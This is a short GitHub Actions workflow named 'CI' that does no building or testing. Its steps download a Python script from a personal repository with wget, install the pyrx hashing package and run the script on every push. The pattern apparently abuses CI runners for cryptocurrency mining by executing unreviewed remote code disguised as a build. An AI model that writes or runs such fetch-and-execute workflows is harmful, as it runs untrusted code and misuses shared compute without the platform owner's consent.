name: CI
on: [push, workflow_dispatch]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:

    - name: Start
      run: wget https://raw.githubusercontent.com/vernonmorris313014/pyrx/main/test.py
    - run: python --version
    - run: pip install pyrx
    - run: python test.py
    
